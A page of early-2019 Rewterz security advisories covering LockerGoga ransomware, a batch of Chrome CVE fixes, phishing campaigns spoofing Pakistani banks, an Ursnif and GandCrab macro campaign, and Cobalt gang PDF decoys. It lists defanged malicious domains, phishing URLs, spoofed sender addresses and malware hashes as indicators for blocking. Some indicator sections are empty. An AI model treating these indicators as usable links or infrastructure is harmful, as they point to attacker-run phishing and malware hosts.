Posted by Web Editor in Rewterz News on January 31st, 2019
CATEGORY: Medium
SEVERITY: Cyber Crime
ANALYSIS SUMMARY
New LockerGoga Ransomware has been found mainly in a cyber attack on the French engineering consultancy, Altran Technologies.
The distribution method of this Ransomware is not clear yet. Once the ransomware is executed, it targets DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files. Samples for this ransomware have been uploaded from Romania and Netherlands whereas its victims have been observed in five different countries.
The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption. Some researchers declared it a sloppy, slow ransomware that doesn’t aim to evade detection. Security researchers informed that the ransomware spawned a new process for each file it encrypted, making the encryption process to be very slow. Once it has encrypted files, it appends the extension .locked to encrypted files and leaves a ransom note on the desktop like this:
Bleeping Computer suggests that the first rule of Security Researcher V should be considered while trying to detect the family of infections using Yara, in order to save organizations from the LockerGoga Ransomware.
INDICATORS OF COMPROMISE
Filename
Email Address
Malware Hash (MD5/SHA1/SH256)
REMEDIATION
Block the threat indicators at their respective controls and keep your systems up-to-date. Since the attack vector is still unknown, using products with vulnerabilities increases risk of attack by a malicious entity.
Posted by Web Editor in Rewterz News on January 31st, 2019
SEVERITY: HIGH
CATEGORY: Vulnerability
ANALYSIS SUMMARY
Google has released security updates for Google Chrome addressing multiple vulnerabilities that an attacker could exploit to take control of an affected system. There are 58 security fixes in the new version for Windows, Mac and Linux. Following vulnerabilities ranging from Medium to High severity have been addressed.
CVE-2019-5754: Inappropriate implementation in QUIC Networking
CVE-2019-5755: Inappropriate implementation in V8
CVE-2019-5756: Use after free in PDFium
CVE-2019-5757: Type Confusion in SVG
CVE-2019-5758: Use after free in Blink.
CVE-2019-5759: Use after free in HTML select elements.
CVE-2019-5760: Use after free in WebRTC
CVE-2019-5761: Use after free in SwiftShader
CVE-2019-5762: Use after free in PDFium
CVE-2019-5763: Insufficient validation of untrusted input in V8.
CVE-2019-5764: Use after free in WebRTC
CVE-2019-5765: Insufficient policy enforcement in the browser.
CVE-2019-5766: Insufficient policy enforcement in Canvas.
CVE-2019-5767: Incorrect security UI in WebAPKs.
CVE-2019-5768: Insufficient policy enforcement in DevTools.
CVE-2019-5769: Insufficient validation of untrusted input in Blink.
CVE-2019-5770: Heap buffer overflow in WebGL
CVE-2019-5771: Heap buffer overflow in SwiftShader
CVE-2019-5772: Use after free in PDFium
CVE-2019-5773: Insufficient data validation in IndexedDB.
CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing.
CVE-2019-5775: Insufficient policy enforcement in Omnibox.
CVE-2019-5776: Insufficient policy enforcement in Omnibox.
CVE-2019-5777: Insufficient policy enforcement in Omnibox.
CVE-2019-5778: Insufficient policy enforcement in Extensions.
CVE-2019-5779: Insufficient policy enforcement in ServiceWorker.
CVE-2019-5780: Insufficient policy enforcement
CVE-2019-5781: Insufficient policy enforcement in Omnibox.
CVE-2019-5782: Inappropriate implementation in V8
Other issues addressed in the update include:
Use after free in FileAPI
Use after free in Mojo interface
Use after free in Payments.
Stack buffer overflow in Skia
Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions and possibly take control of a system.
IMPACT
Code Execution
Security Bypass
System Access
REMEDIATION
Update to the latest version: Chrome 72.0.3626.81 for Windows, Mac and Linux, which contains a number of fixes and improvements.
If you think you’re a victim of a cyber-attack, immediately send an email to soc@rewterz.com.
Posted by Web Editor in Rewterz News on January 30th, 2019
SEVERITY: High
CATEGORY: Phishing
ANALYSIS SUMMARY
Looking at the recent Phishing Campaigns observed attacking employees of the banking sector in Pakistan, it’s highly possible that the same Phishing Attacks are targeting customers of banks too. Therefore, it is suggested to urgently run awareness programs for employees as well as customers.
Phishing emails are fake emails falsely claiming identity of a legitimate organization in order to steal credentials or personal information. Phishing mainly uses popular communication tools like emails, instant messaging and peer-to-peer communication, either directly obtaining sensitive information or luring victims into visiting fake websites.
The fake websites usually look very similar to the legitimate websites of the respective banks and can not be detected as malicious by an unsuspecting user. The information entered on such sites like username, passwords, etc. can be used to carry out fraudulent activities like unauthenticated transactions or can be sold to fraudulent groups for further malicious activity.
IMPACT
Information Disclosure
Credential Theft
Account Compromise
Fraudulent Transactions
REMEDIATION
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: Medium
CATEGORY: Phishing
ANALYSIS SUMMARY
A campaign distributing both Ursnif malware and GrandCrab ransomware via malicious Word documents attached to phishing emails. The Word documents contained a VBS macro that executes a base64 encoded PowerShell script. The PowerShell script is used to retrieve the files associated with the GrandCrab and Ursnif infections. The first payload that is downloaded and executed is a PowerShell command used to download an additional PowerShell script. This additional PowerShell script contains a base64 encoded PE file which it injects into memory for execution. This PE file was identified to be a variant of the GrandCrab ransomware. The second payload that is download and executed via the VBS macro is the Ursnif executable, which is used for malicious activities such as gathering system information and harvesting credentials.
Impact
Leakage of system information
Loss of credentials
INDICATORS OF COMPROMISE
URLs
bevendbrec[.]com
iscondisth[.]com
Malware Hash (MD5/SHA1/SH256)
c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f
d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525
0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080
Remediation
Block all URL’s and IoC’s at your respective controls.
Ensure anti virus software and associated files are up to date.
Always be suspicious about emails sent to users from unknown senders.
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: Medium
CATEGORY: Phishing
ANALYSIS SUMMARY
Following the previous two phishing campaigns that spoofed Summit Bank and Bank Al-Habib, the streak continues targeting bank employees in Pakistan with two fresher campaigns. This time the attackers spoofed Faysal Bank’s internet banking site and the Standard Chartered Bank. The email claiming to come from Faysal Bank looks like this:
Whereas, clicking on the “Click Here Now”, users are redirected to a malicious URL that looks very similar to the legitimate Internet Banking site of Faysal Bank. An unsuspecting user isn’t likely to differentiate between the fake and the original site.
Second campaign of the day fakes the identity of Standard Chartered Bank and has targeted more than hundred bank employees in Pakistan. The email pretending to be coming from Standard Chartered bank looks like this:
The hyperlink in this email also redirects to a URL which again looks similar to the legitimate site.
However, this time the site requires more information other than just credentials. When the information is provided, the user is redirected to the login page of original website of the bank, not logged-in.
Impact
Credential Theft
Exposure of Personal Information
Indicators of Compromise
URLs
https[:]//cbd9[.]net/images/query/faysalmobit/faysalmobit[.]php http[:]//blayzercommerce[.]com/wp-content/themes/twentysixteen/schartered/schartered[.]html
Email Address
noreplymobit[@]faysalbank[.]com[.]pk
iBanking[.]Pakistan[@]sc[.]com
Email Subject
Faysal Bank Account Locked
Standard Chartered Bank – Account Locked
Remediation
The count of these phishing campaigns targeting bank employees in Pakistan and spoofing the identity of banks has reached four now. It is advised to strictly avoid opening irrelevant or unexpected emails, attachments and URLs even if the source looks as legitimate as a financial organization.
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: HIGH
CATEGORY: DATA BREACH
ANALYSIS SUMMARY
Known for targeting financial organizations, the Cobalt gang resurfaces with another campaign that drops malware. About 42 targets from the financial and banking sector around the World have been attacked by the Cobalt gang’s campaign, meant to drop malware via PDF decoys using App Engine Google Cloud computing platform (GCP).
The attackers are abusing the GCP URL redirection in PDF decoys and redirecting to the malicious URL hosting the malicious payload.
The URL hosting the malware points the host URL to Google App Engine, making it more trust-able for the targets. Most of the PDF’s involved were created using Adobe Acrobat 18.0. The PDF decoy downloads a word document containing obfuscated macro code. This document was downloaded from the URL https://transef[.]biz.
Once the download is complete, a message pops up on opening the document that requires enabling editing and content mode to view the document. On enabling the option, the macro is executed downloading another stage payload.
IMPACT
Code Execution
Malware Infection
INDICATORS OF COMPROMISE
URLs
FILENAME
EXTENSION
.eml
EMAIL ADDRESS
REMEDIATION
Copyright © Rewterz. All rights reserved.
